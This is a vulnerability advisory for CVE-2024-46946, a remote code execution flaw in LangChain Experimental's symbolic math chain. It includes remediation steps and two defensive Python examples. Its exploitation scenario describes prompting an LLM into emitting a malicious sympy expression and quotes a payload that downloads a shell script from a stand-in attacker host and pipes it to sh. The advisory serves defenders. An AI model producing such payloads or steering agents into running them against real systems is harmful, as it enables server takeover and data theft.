CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain

CRITICAL | PoC AVAILABLE | CISA: ATTEND
Published September 19, 2024
CISO Take

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

What is the risk?

Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.

What systems are affected?

Package | Ecosystem | Vulnerable Range | Patched
LangChain | pip | | No patch

Do you use LangChain? You're affected.

How severe is it?

CVSS 3.1: 9.8 / 10
EPSS: 1.3% chance of exploitation in 30 days (higher than 68% of all CVEs)
Exploitation Status: Exploit Available
Exploitation: MEDIUM
Sophistication: Trivial
Exploitation Confidence: medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

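Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High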

What should I do?

  1. PATCH

    Upgrade langchain-experimental to a version above 0.3.0 immediately.

  2. AUDIT

    Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.

  3. DISABLE

    If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.

  4. ISOLATE

    Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities).

  5. DETECT

    Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs.

  6. VERIFY

    Confirm remediation by checking installed package version: pip show langchain-experimental.
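
An added example (not part of the original advisory or of the LangChain project) covering the AUDIT and VERIFY steps: it checks a version string against the affected range stated in the advisory (0.1.17 through 0.3.0) and lists Python files that import or reference LLMSymbolicMathChain. The function names are illustrative assumptions.

```python
import ast
import re
import sys
from importlib import metadata
from pathlib import Path

# Affected range as stated in the advisory text: 0.1.17 through 0.3.0 inclusive.
FIRST_BAD, LAST_BAD = (0, 1, 17), (0, 3, 0)
CHAIN = "LLMSymbolicMathChain"

def release_tuple(version):
    """Leading numeric release segment, padded to 3 parts: '0.3.1rc1' -> (0, 3, 1)."""
    nums = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not nums:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in nums.group().split(".")]
    return tuple(parts + [0] * (3 - len(parts)))

def is_vulnerable(version):
    return FIRST_BAD <= release_tuple(version) <= LAST_BAD

def installed_version(dist="langchain-experimental"):
    """Version of the installed distribution, or None if it is not installed."""
    try:
        return metadata.version(dist)
    except metadata.PackageNotFoundError:
        return None

def find_chain_usage(root):
    """Sorted (path, line) pairs where the chain is imported or referenced in code."""
    hits = set()
    for path in Path(root).rglob("*.py"):
        text = path.read_text(encoding="utf-8", errors="replace")
        try:
            tree = ast.parse(text)
        except SyntaxError:
            if CHAIN in text:  # unparseable file: report line 0 for manual review
                hits.add((str(path), 0))
            continue
        for node in ast.walk(tree):
            if isinstance(node, ast.ImportFrom):
                names = [alias.name for alias in node.names]
            else:  # only ast.Name has .id and only ast.Attribute has .attr
                names = [getattr(node, "id", None), getattr(node, "attr", None)]
            if CHAIN in names:
                hits.add((str(path), node.lineno))
    return sorted(hits)

if __name__ == "__main__":
    ver = installed_version()
    print("installed:", ver, "| in affected range:", bool(ver) and is_vulnerable(ver))
    for path, line in find_chain_usage(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}:{line}: references {CHAIN}")
```

Because the scan works on the parsed syntax tree, mentions that appear only in comments or string literals are not reported, which keeps the inventory focused on code that actually loads the chain.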

What does CISA's SSVC say?

Decision: Attend
Exploitation: poc
Automatable: Yes
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 9 - Risk Management System
ISO 42001: 9.1 - Monitoring, Measurement, Analysis and Evaluation
NIST AI RMF: MS-2.5 - Testing, Evaluation, Validation and Verification
OWASP LLM Top 10: LLM02 - Insecure Output Handling

Frequently Asked Questions

Is CVE-2024-46946 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.

What systems are affected by CVE-2024-46946?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.

What is the CVSS score for CVE-2024-46946?

CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.35%.

What is the AI security impact?

Affected AI Architectures

agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 9.1
NIST AI RMF: MS-2.5
OWASP LLM Top 10: LLM02

What are the technical details?

Original Advisory

langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).

Exploitation Scenario

An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge are required — the public PoC confirms this is script-kiddie territory. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.

Weaknesses (CWE)

CWE-20 — Improper Input Validation: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

  • [Architecture and Design] Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]
  • [Architecture and Design] Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).

Source: MITRE CWE corpus.
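
An added example (not the project's fix and not code from the original advisory) of the recognizer approach described above: a syntax-tree allowlist that accepts only a small arithmetic grammar and never evaluates the string. The allowlists, the length limit and the function names are assumptions, and the grammar is Python expression syntax, which is stricter than what sympy accepts.

```python
import ast

# Assumed allowlists for this example; size them to the application's real needs.
ALLOWED_FUNCS = {"sin", "cos", "tan", "exp", "log", "sqrt", "diff", "integrate", "solve"}
ALLOWED_SYMBOLS = {"x", "y", "z", "pi", "E"}
ALLOWED_OPS = (ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Pow, ast.USub, ast.UAdd)
MAX_LEN = 200  # assumed cap; also bounds parser recursion depth


def check_node(node):
    """Raise ValueError unless node belongs to the small arithmetic grammar."""
    if isinstance(node, ast.Expression):
        check_node(node.body)
    elif isinstance(node, ast.Constant):
        if type(node.value) not in (int, float):
            raise ValueError(f"literal of type {type(node.value).__name__} not allowed")
    elif isinstance(node, ast.Name):
        if node.id not in ALLOWED_SYMBOLS:
            raise ValueError(f"unknown symbol {node.id!r}")
    elif isinstance(node, ast.BinOp) and isinstance(node.op, ALLOWED_OPS):
        check_node(node.left)
        check_node(node.right)
    elif isinstance(node, ast.UnaryOp) and isinstance(node.op, ALLOWED_OPS):
        check_node(node.operand)
    elif isinstance(node, ast.Call):
        # Only bare allowlisted names may be called: no attribute access, no keywords.
        if not (isinstance(node.func, ast.Name) and node.func.id in ALLOWED_FUNCS):
            raise ValueError("call target not in allowlist")
        if node.keywords:
            raise ValueError("keyword arguments not allowed")
        for arg in node.args:
            check_node(arg)
    else:
        # Attribute, Subscript, Lambda, comprehensions, etc. are all rejected here.
        raise ValueError(f"{type(node).__name__} not allowed")


def validate_math_expr(expr):
    """Return (True, '') if expr is in the grammar, else (False, reason)."""
    if len(expr) > MAX_LEN:
        return False, "expression too long"
    try:
        check_node(ast.parse(expr, mode="eval"))
    except (SyntaxError, ValueError, RecursionError) as err:
        return False, str(err)
    return True, ""
```

Only a string that passes `validate_math_expr` would be handed on to the math backend; the check complements upgrading the package and does not replace it.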

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: September 19, 2024
Last Modified: July 16, 2025
First Seen: September 19, 2024

Related Vulnerabilities